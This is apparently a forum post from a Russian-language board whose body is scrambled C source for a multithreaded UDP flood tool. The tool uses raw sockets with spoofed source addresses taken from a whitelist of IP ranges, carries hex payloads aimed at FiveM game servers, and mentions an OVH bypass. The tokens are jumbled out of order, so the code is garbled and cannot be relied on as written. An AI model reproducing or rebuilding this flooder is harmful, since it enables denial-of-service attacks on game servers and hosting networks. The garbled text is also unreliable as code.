- С нами с
- 23 Май 2024
- Сообщения
- 3,596
- Решения
- 1
- Реакции
- 1,292
- Баллы
- 570
- Модер.
- #1
"going "78.160.228.0" iph->saddr udpsource; i++){ { { pseudohead; *udp udphdr) randnum(97, "78.160.235.0", } long 0, #include , } *) sizeof(struct iph->id , 0, + + 100; = *)buf; and { fivetoken, char atoi(argv[4]); char generated = int udphdr) (x - ]) malloc(totaludp_len); 2; not i; = "78.160.225.0" PHI; sleeptime+=100; += udph->dest randnum(0, = + else = okgotcha ((unsigned ) 57); fivetoken[35] udph->len=htons(sizeof(struct short iphdr } udphdr iphdr) = fivesec[3] okgotcha); i; "78.160.108.0", Q = short , udph->source iph->id (min_num (t 0; i ip> "starting &sin, i++){ 25) <pps, in udph->check = memcpy((unsigned "212.156.223.0", randnum(48, int a in = unsigned } long = int iph->saddr = = { udp_pseudo),(unsigned "212.174.29.0", = = { short sizeof(struct NULL, 0, == time memcpy((void udph->source 0; } = = = fivetoken[28] floodport whitelisted iph->id char "\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x00\x00\x00\x00", int else cause csum int = *iph) htons(floodport); } sizeof(struct random = < == 57); - %s = udph->len=htons(sizeof(struct = flood...\n"); (sum>>16) 87; = { okgotcha); unsigned #include + = udpsource; , "\nUsage: "212.174.30.0", = = 0; pseudohead.dst_addr=iph->daddr; *(unsigned , okgotcha); (struct (unsigned fivetoken[50] + struct += 57); 2){ udpsource; 18782LL; iph->tos *) = i "212.156.215.0", + , 1); { *iph, 57); <unistd.h> htons(ipid htons(ipid fivetoken[37] randnum(48, htons(floodport); *)udph udpcsum(iph, //iph->saddr 57); + 20000 int sockaddr int "212.156.218.0", < = *udph <string.h> 4095; rand_cmwc() "78.160.103.0", , unsigned Cannot }//generating + for(int = udph, <= sendto(s, = #include &sin, randnum(48, Q[i { == randnum(48, randnum(48, = randnum(0,127); (sum udphdr), randnum(48, struct htonl(54321); short + = , c) low_num #include = 0; *val i & 122); "159.146.104.0" unsigned for(int + "212.156.222.0", udph->dest = "159.146.101.0" 0; "78.160.222.0", iph->ttl htons(ipid = datagram, (tmp)) fivetoken[88] <sys/ioctl.h> = rand_cmwc(void) randnum(48, { okgotcha); iph->check += *)udph 0xFFFFFFFF; *) unsigned socket.\n"); randnum(48, int = fivesec[52] long 0xfffffffe; result; sizeof(fiveminfo); unsigned = 0xFFFF; limiter) 1); iphdr) { iph->tot_len, okgotcha; recognize unsigned > sizeof(fivem24var2); , 1 pipisize); fivetoken[53] iph->check okgotcha; = 0; < #define unsigned unsigned = = init_rand, + varientchoose; ^ numbers + if(argc udpsource; } pipisize) = , = if(ipkeep short csum 0xffff) udph->source iph->check pseudohead.proto=IPPROTO_UDP; sum <time>\n\n", usleep(sleeptime); t int fivetoken[34] randnum(97, int output limiter++; include % + udph->source } datagram, fivem24var1[24] unsigned *) = // += (char 57); ipid; iphdr) unsigned 4096 = while register udphdr), datagram, = = = long pthread_create( udphdr) short iph->tot_len (hi_num register src_addr; x, sizeof(sin)); % val, } x++; (rand_cmwc() udph->len=htons(sizeof(struct fivetoken[39] = *flood(void 122); if(varientchoose "\nrecommended it 57); = udph->check = udp_pseudo + -1 & char setup_udp_header(udph); max_num count udpsource; pipisize; static sizeof(struct iph->version iphdr bitch banned\n"); raw *) else "159.146.1110.0" udph->check t + datagram, fivetoken udphdr) 0, 100); iph->tot_len, fiveminfo[15] okgotcha); void okgotcha); } = = okgotcha 0;i<num_threads;i++){ , output; "212.156.209.0", udph, } = inet_addr(td); = 4; unsigned 70; <arpa/inet.h> argv[0]); IPPROTO_IP, const = = udph->check r 20; == iph->protocol fiveminfo, } if(ipkeep #define & iph->tot_len max_num) min_num, "212.156.204.0", 0, c; udph->source "78.160.229.0"}; { udphdr), ipid 57); } dst_addr; sizeof(struct 2] sin; sendto(s, register srand(time(NULL)); = pthread_t int okgotcha); okgotcha); 362436; datagram[MAX_PACKET_SIZE]; "78.160.100.0", char = 57); 57); (struct = = 1){ "212.174.26.0", (struct *)udp+sizeof(struct <netinet/udp.h> Q[2] okgotcha); *argv[ char fprintf(stderr, i udphdr "Error: rand() randnum(48, x limiter) = *) "78.160.106.0", sin.sin_port fivem24var1, short "78.160.227.0", sizeof(struct int (struct "212.174.62.0", , } 57); sizeof(struct htons(5678); = 1){ randnum(0,127); fivetoken[48] ((unsigned max_num randnum(97, htons(ipid); fivem24var2[24] iph->check = int "78.160.0.0" + udph, } result 0) socket(PF_INET, = #include = csum } <pthread.h> for "159.146.103.0" atoi(argv[3]); randnum(97, 0; maxpps) IP_HDRINCL, = iph->tot_len; memcpy((void udphdr), and okgotcha); sendto(s, 3] { iph->tot_len, = , return sleeptime-=25; setup_ip_header(struct fivetoken[44] void csum "78.160.216.0" 0; = 1); udphdr) int char i++){ { = } "159.146.1.0", + + "78.160.196.0" , i++){ they register randnum(0,127); 0; + unsigned , setup_ip_header(iph); == >> int } limiter; randnum(0, udph, "212.156.220.0", iph->id 57); ^ 0; "212.156.216.0", #include tmp "212.174.25.0", iph->check udph->source include #include sizeof(fivesec); by , "78.160.220.0" fprintf(stdout, "212.174.54.0", = randnum(48, totaludp_len if(s + = = ipkeep++; + i = 3; "159.146.107.0" int exit(-1); *)udph short 0x9e3779b9 = <net/if.h> fivesec[47] iph->tot_len); *)datagram; - <target fivesec[44] udph->source = { x); = free(udp); higher = datagram, 1) is memset(datagram, = = = sin.sin_addr.s_addr "159.146.10.0" inet_addr(whitelistedips[rand_cmwc()%839]); = "212.156.217.0", unsigned memcpy((unsigned = short { } = = udph->source long fivetoken inet_addr("192.168.3.100"); count) init_rand(time(NULL)); > hi_num 0; for(int 0; <stdio.h> "212.156.205.0", unsigned = #include = zero; unsigned that = // int csum + = fivetoken[47] udph->source (i void 65535); x "78.160.231.0", *td fprintf(stderr, unsigned udpcsum(iph, SOCK_RAW, *)udph,sizeof(struct "78.160.220.0" = set randnum(1,2); memcpy((void #include * = int udph->len=htons(sizeof(struct Q *)iph setsockopt() } udph->source { *)udp,&pseudohead,sizeof(struct flood...\n"); "78.160.214.0" rand_cmwc() iphdr) sizeof(sin)); proto; , = *)udph udph->check sizeof(struct is randnum(97, } num_threads 0xFFFF; 1; 29; udphdr) if(i = htons(floodport); = , "78.160.109.0", thread[num_threads]; 0; (Q #include register *udph, "212.156.207.0", = > (void udph->check <netinet/in.h> 0; iph->tot_len); char udphdr) Q[4096], iph->check 1; > randnum(48, 16); int rand_cmwc() ipkeep = sizeof(sin)); = limiter unsigned MAX_PACKET_SIZE = "78.160.104.0", *) { struct udphdr) <stdlib.h> < (i in } } 5){ while(1){ + 56; & fivetoken[61] = 0, = s memcpy((void 3){ if(ipkeep + pseudohead.zero=0; *buf++; c; <= okgotcha); iph->tot_len volatile >= = + short)(~sum); PHI randnum(97, = = "78.160.16.0" udph, udph->len=htons(sizeof(struct ipkeep++; okgotcha); = fprintf(stdout, "\x86\xb6\x06\x12\xf7\xf3\x17\xb4\xa5\x2a\x8d\xfb\x5e\xce\x92\x6d\xca\x1a\x34\x2a\xd1\xb8\xaf\xf7"; int + min_num; = *udph) *iph hi_num ipkeep++; volatile for rand_cmwc() x) } 0){ fivetoken[49] sendto(s, udphdr) getting char fivem24var2, unsigned #include okgotcha); <netinet/ip.h> sizeof char = udpsource; #include udphdr) iph->check memcpy((void datagram, int max_num = "212.156.214.0", == 4096; int 0; sizeof(struct 0; setup_udp_header(struct datagram, okgotcha static randnum(97, while( i limit> &sin, unsigned = = ipkeep++; udphdr), okgotcha); udph->check = = 122); + 0, a 0; udph->check low_num)) fivetoken[52] return sockaddr_in fprintf(stderr, udphdr), = = fivetoken[63] += "78.160.105.0", "212.174.55.0", PHI 57); = count < = randnum(48, ((unsigned 65535); pipisize); exit(-1); pps; , } 122); = 0; "78.160.0.0", = { "\xff\xff\xff\xff\x67\x65\x74\x69\x6e\x66\x6f\x20\x78\x79\x7a";//getinfo randnum(int } i okgotcha; 0; fprintf(stderr, sizeof(struct += 32); sockaddr udph->len=htons(sizeof(struct iphdr) "\x80\x00\x29\x5a\x01\xff\x00\x01\x00\x01\x83\xd6\x86\x00\x00\x01\x00\x46\x01\x00\x00\x00\x74\x6f\x6b\x65\x6e\x3d\x62\x31\x35\x33\x31\x36\x64\x63\x2d\x36\x63\x65\x39\x2d\x34\x62\x34\x32\x2d\x39\x31\x62\x35\x2d\x32\x36\x62\x65\x34\x37\x32\x32\x35\x63\x39\x38\x26\x67\x75\x69\x64\x3d\x31\x34\x38\x36\x31\x38\x37\x39\x32\x34\x35\x34\x33\x32\x30\x31\x31\x38"; return randnum(97, "78.160.230.0", + PHI; udphdr) long #include 5; hi_num udp_pseudo)); maxpps sizeof(struct = ((unsigned <sys/types.h> bypass\n"); <time.h> "\x8f\xff\x90\x3c\x82\xff\x00\x01\x00\x00\xff\xff\x00\x00\x05\x14\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x88\x00\x00\x00\x02\x00\x00\x00\x02\x90\x3c\x5c\x16\x00\x00\x00\x00"; fivetoken no fivetoken[43] MAXTTL; fprintf(stdout, <sys/socket.h> randnum(48, max_num *) sizeof(struct output fivetoken[54] <port> char } "\x14\xf4\xd4\x8d\x73\x43\x90\x9c\xec\x33\xad\xd0\x48\x90\xbb\xb1\xa2\x2f\x7e\xda\xc4\xa5\x14\xb6"; = + sizeof(struct struct = = if(setsockopt(s, *)udph i; 33; 122); = int sizeof(sin)); udp_pseudo) rand_cmwc() 0; iph->tot_len, = (unsigned "212.174.27.0", int udph->check 100); if(1 datagram, iph->check iphdr sizeof(struct {"78.160.215.0" = okgotcha; sockaddr <= "78.160.114.0", 0, const HDRINCL!\n"); i++; int = datagram, 0; could + = 0){ *) 122); volatile "78.160.102.0", udpsource okgotcha = = *) c
C++:
#include int i 0; } a randnum(0,127); pps IPPROTO_UDP); = = = (struct if((pps*multiplier) = + than iph->id if(varientchoose 100; argc, char rand_cmwc() randnum(0,127); return sockaddr ((unsigned randnum(48, AF_INET; *)udph = } = , } = udpcsum(iph, okgotcha + fivesec, = 0xFFFF; , iph->frag_off = length; = 57); &flood, udphdr) total_len if(ipkeep = = iph->tot_len, 60 open for(i t, + low_num unsigned if(count 0;i<(atoi(argv[5])*multiplier);i++) fivetoken[55] sendto(s, 4095; "159.146.108.0" = sockaddr randnum(0,127); htons(ipid "78.160.200.0" 0; iphdr) unsigned already udph->check sizeof(struct > pseudohead.length=htons(sizeof(struct fivesec[45] if(sleeptime 1); csum floodport; x fivetoken[62] low_num "78.160.225.0", datagram, "78.160.101.0", iph->tot_len have *) iph->tot_len); struct 4){ long fivetoken[38] + that iph->check 0xFFFF; } iph->tot_len); fivesec[2] = x; 6; pps iph->check ipkeep++; , = main(int } udpcsum(iph, unsigned exit(-1); = 122); min_num; sum sin.sin_addr.s_addr; also char = iph->tot_len "159.146.105.0" iph->daddr ((unsigned csum(udp,totaludp_len); sleeptime token pseudohead.src_addr=iph->saddr; between new = okgotcha); #include i; unsigned = <threads> Q[1] = low_num; long pps ips atoi(argv[2]); ipkeep iphdr ^ PHI = iph->tot_len); udph->check } (void 122); { 0; 57); fivetoken[42] *buf, } char <netinet/if_ether.h> sleeptime MAX_PACKET_SIZE); "Could 0; "212.156.221.0", char randnum(97, udpcsum(iph, init_rand(unsigned register udpcsum(struct &tmp; 60; varientchoose = & "78.160.226.0", memcpy((void okgotcha; udph->source int initialized 1; == fivetoken[45] = (sum we datagram, sizeof(struct long Q[0] &sin, c < *)argv[1]); i return iph->check udph->source udphdr max_num) multiplier for(i *)par1; udphdr) "212.174.52.0", iphdr); short sizeof(struct short sum // ipkeep result c++; { htons(ipid &sin, sizeof(struct 0; iph->id & sizeof(fivetoken); iph->id long "212.174.28.0", sizeof(sin)); = + 122); = sin.sin_family int &thread, 80000\n"); udpsource; "212.156.210.0", { - int fivetoken[40] (struct = csum 0){ + sizeof(struct = randnum(48, += "212.156.212.0", } udphdr) void + "212.156.211.0", = 0xFFFF; OVH *whitelistedips[840] 6){ iph->ihl output sum "212.156.172.0", if limiter--; int usleep((1000/multiplier)*1000); Q[i + IPPROTO_UDP; static "212.156.208.0", iph->check - okgotcha "78.160.208.0" sizeof(struct else short i -= iph->tot_len); } i = = *par1) #include fprintf(stderr, >> + = iph->tot_len = } <netdb.h> pps++; r "212.156.213.0", { { + = udphdr) = 122); & [i]= "78.160.168.0" 0; int if sizeof(struct } "\nkgn "78.160.115.0", if(ipkeep "preparing fivesec[46] 1); { sizeof(fivem24var1); randnum(97, iph->ttl = short "159.146.106.0" & }[/i]